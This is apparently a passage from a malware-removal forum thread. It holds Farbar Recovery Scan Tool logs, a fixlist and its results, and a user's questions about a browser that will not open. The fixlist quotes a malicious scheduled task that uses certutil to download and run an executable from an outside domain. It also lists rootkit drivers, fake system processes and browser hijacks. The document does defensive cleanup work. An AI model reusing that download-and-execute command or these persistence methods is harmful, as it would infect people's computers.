2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx 2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx 2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt 2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt 2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip 2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition 2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP 2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe ==================== One month (modified) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-02-17 12:47 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent 2019-02-17 07:59 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc 2019-02-16 10:34 - 2018-05-03 17:58 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001 2019-02-16 09:05 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI 2019-02-16 09:05 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf 2019-02-16 09:02 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive 2019-02-16 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2019-02-16 08:59 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache 2019-02-16 07:54 - 2018-05-12 16:22 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Lavasoft 2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\ProgramData\Lavasoft 2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\Program Files (x86)\Lavasoft 2019-02-16 07:32 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI 2019-02-16 06:09 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db 2019-02-16 05:57 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700 2019-02-16 05:57 - 2018-05-04 17:01 - 000001050 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk 2019-02-16 05:57 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera 2019-02-15 01:31 - 2018-05-04 07:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DriverPack Easy Search 2019-02-15 00:15 - 2018-06-24 08:33 - 000002320 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2019-02-15 00:08 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db 2019-02-15 00:03 - 2018-06-04 23:16 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Temp 2019-02-14 02:43 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk 2019-02-14 02:43 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2019-02-14 02:25 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL 2019-02-14 02:25 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH 2019-02-14 02:23 - 2018-06-05 13:20 - 000000000 ____D C:\Users\Stanley\Desktop\final 2019-02-14 02:23 - 2018-05-09 22:35 - 000000000 __SHD C:\Users\Stanley\AppData\Roaming\C67FA6 2019-02-12 21:30 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley 2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft 2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer 2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration 2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce 2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla 2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness 2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie 2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie 2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat 2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM 2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft 2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft 2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc 2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery 2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva 2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt 2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed 2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft 2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer 2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare 2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft 2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft 2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare 2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare 2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios 2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old 2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics 2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk 2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer ==================== Files in the root of some directories ======= 2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll 2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat 2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg Some zero byte size files/folders: ========================== C:\Windows\mssecsvc.exe C:\Windows\SysWOW64\taskshostservices.exe C:\Windows\System32\taskshostservices.exe C:\Windows\System32\Drivers\WinmonProcessMonitor.sys C:\Windows\SysWOW64\Drivers\winmon.sys C:\Windows\SysWOW64\Drivers\winmonfs.sys C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\dllhost.exe => File is digitally signed C:\Windows\SysWOW64\dllhost.exe => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2019-02-13 14:45 ==================== End of FRST.txt ============================
  8. thank you so much. everything looks good now. i can use my chrome browsers. but i still have this delayed log on, like after restarting or login back in after logout. i hope that is not an issue???
  9. ok thank you. I just ran the fixlist. and I got this log below. meanwhile I still can't open my chrome browser. Fix result of Farbar Recovery Scan Tool (x64) Version: 13.02.2019 Ran by #Strazzo.RoseGold## (14-02-2019 23:59:05) Run:1 Running from C:\Users\Stanley\Downloads\FRST Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator) Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: EmptyTemp: CloseProcesses: () C:\Windows\windefender.exe HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [WitheredHill] => C:\Windows\rss\csrss.exe [4521472 2019-02-08] () <==== ATTENTION HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [CloudNet] => C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-12] (EpicNet Inc.) <==== ATTENTION HKU\S-1-5-18\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eouPPD3a3O4qGVi5Es4iIR24Y7nh9akfPai5Q1OuzbONZLJRZFaqq_kxQ9Z-DCo_GGN5rXIyO8FSvytDaIXTrMcfHrh750Q&q={searchTerms} HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eoicpfV_MriSUAQnsKvLWIZ4S1YS7CQyd2I9U6z0Wmnkj5s8T6U3A_ZCShl9ETmnnVUnHlDWcYqc1HesPtQHGIzTqr4X-kp SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms} SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms} BHO: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04] CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] CHR HKLM-x32\...\Chrome\Extension: [cncgohepihcekklokhbhiblhfcmipbdh] - hxxp://clients2.google.com/service/update2/crx OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767" OPR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder) R1 2CCD359FD649; C:\Windows\2CCD359FD649.sys [621928 2019-02-08] (????????(??)???? -> VxDriver) R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-12] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] S3 WinRing0_1_2_0; \??\C:\Users\Stanley\AppData\Local\Temp\7ZipSfx.000\bin\tools\openhardwaremonitor\OpenHardwareMonitor.sys [X] <==== ATTENTION CustomCLSID: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Stanley\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File Task: {15570572-319C-48BD-AD3A-A7BCC7852BC7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION Task: {3BA5F14D-A722-4A2B-BB6D-E5E747D3F491} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION Task: {567829EB-0803-46FA-8139-6EAAC8AC96FA} - System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall Task: {C3FE92DB-969F-447D-9F05-1E0093D0326E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://delaker.info/app/app.exe C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe/update!STRAZZOWEEZY\#Strazzo.Ros <==== ATTENTION ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779 ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.?????.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "JKZDOH8VNLX91K7" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "4571129" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "Q92XOF6FK3X9RHU" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "6137198" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1204047" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1214425" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9352489" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9159382" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "E054W697C3ZT54X" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "19U1RNX4SXNVB7C" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "SWPR71H14U5B9RU" FirewallRules: [{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{57D02F10-F87D-4455-8142-3BD552673374}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{7B7AEBBA-530C-47FF-B21F-41D628410DFC}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{587A092A-9420-4320-9DDC-513DB0956BC2}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{F323F12D-3EEC-4458-B055-FBAD54D42779}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{3F67B498-C298-4567-8384-9D4AE7900D1F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{39A83BDE-1430-4A5B-8585-D464B7D8D881}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{9965AD37-C5DF-45BB-A1C2-549EA064C54F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{B8A59D96-BE63-4FC8-A092-04A578AB2D75}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [{5BAFDC52-58EF-4B5B-A341-46B75F445987}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [{D5FA44F3-6E70-484A-B950-51C23F63C442}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File FirewallRules: [{798BE548-E73F-4AF0-94AC-9E161FCF481B}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File FirewallRules: [{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File FirewallRules: [{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File FirewallRules: [{53056AED-CF0C-4B77-BE51-E7320F566EF1}] => (Allow) tunmgr.exe No File FirewallRules: [{99F55921-8B24-4D45-9447-4B1DC03D0F8F}] => (Allow) tunmgr.exe No File FirewallRules: [{926B5B97-5586-42AD-A783-764467766E9E}] => (Allow) mDNSResponder.exe No File FirewallRules: [{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}] => (Allow) mDNSResponder.exe No File FirewallRules: [{3982D1B5-9BA8-4969-BF52-16243FA460F3}] => (Allow) C:\Program Files\Syncios\pdt_syncios.exe No File FirewallRules: [{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File FirewallRules: [{38634E52-E26E-4827-B65C-6FD60DEEFCC1}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File FirewallRules: [{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File FirewallRules: [{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File FirewallRules: [{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}] => (Allow) C:\Windows\rss\csrss.exe () FirewallRules: [{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}] => (Allow) C:\Users\#Strazzo.RoseGold##\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File C:\Program Files (x86)\IncrediMail C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss C:\Program Files (x86)\UCBrowser C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\Winmon.sys C:\Windows\2CCD359FD649.sys C:\Users\Stanley\AppData\Roaming\EpicNet Inc C:\Windows\rss\csrss.exe C:\Windows\windefender.exe 2019-02-12 06:47 - 2019-02-12 06:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\EpicNet Inc 2019-02-04 22:34 - 2019-02-05 01:46 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\syncios.exe 2019-01-30 07:52 - 2019-01-30 07:52 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe 2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\syncios.exe 2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe Reboot: ***************** Restore point was successfully created. Processes closed successfully. C:\Windows\windefender.exe => No running process found HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Windows\CurrentVersion\Run\\WitheredHill" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => not found "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks" => removed successfully HKLM\SOFTWARE\Policies\Google => removed successfully HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully HKLM\Software\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => removed successfully HKLM\Software\Classes\CLSID\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => not found HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => removed successfully HKLM\Software\Wow6432Node\Classes\CLSID\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => not found "Firefox homepage" => removed successfully "Firefox newtab" => removed successfully CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04] => Error: No automatic fix found for this entry. CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] => Error: No automatic fix found for this entry. CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] => Error: No automatic fix found for this entry. HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\cncgohepihcekklokhbhiblhfcmipbdh => removed successfully "OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767"" => removed successfully C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo => moved successfully WinDefender => service not found. 2CCD359FD649 => Unable to stop service. HKLM\System\CurrentControlSet\Services\2CCD359FD649 => removed successfully 2CCD359FD649 => service removed successfully HKLM\System\CurrentControlSet\Services\Winmon => removed successfully Winmon => service removed successfully HKLM\System\CurrentControlSet\Services\WinmonFS => removed successfully WinmonFS => service removed successfully HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor => removed successfully WinmonProcessMonitor => service removed successfully HKLM\System\CurrentControlSet\Services\WinRing0_1_2_0 => removed successfully WinRing0_1_2_0 => service removed successfully HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8} => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{15570572-319C-48BD-AD3A-A7BCC7852BC7}" => not found "C:\Windows\System32\Tasks\csrss" => not found "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => not found "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3BA5F14D-A722-4A2B-BB6D-E5E747D3F491}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3BA5F14D-A722-4A2B-BB6D-E5E747D3F491}" => removed successfully C:\Windows\System32\Tasks\UCBrowserUpdater => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UCBrowserUpdater" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{567829EB-0803-46FA-8139-6EAAC8AC96FA}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{567829EB-0803-46FA-8139-6EAAC8AC96FA}" => removed successfully C:\Windows\System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E2C35618-CCBE-4D12-A910-891C3DC29DF9}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3FE92DB-969F-447D-9F05-1E0093D0326E}" => not found "C:\Windows\System32\Tasks\ScheduledUpdate" => not found "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => not found C:\Windows\Tasks\UCBrowserUpdater.job => moved successfully C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.lnk => Could not remove or repair shortcut argument. The shortcut could be damaged. C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.?????.lnk => Could not remove or repair shortcut argument. The shortcut could be damaged. 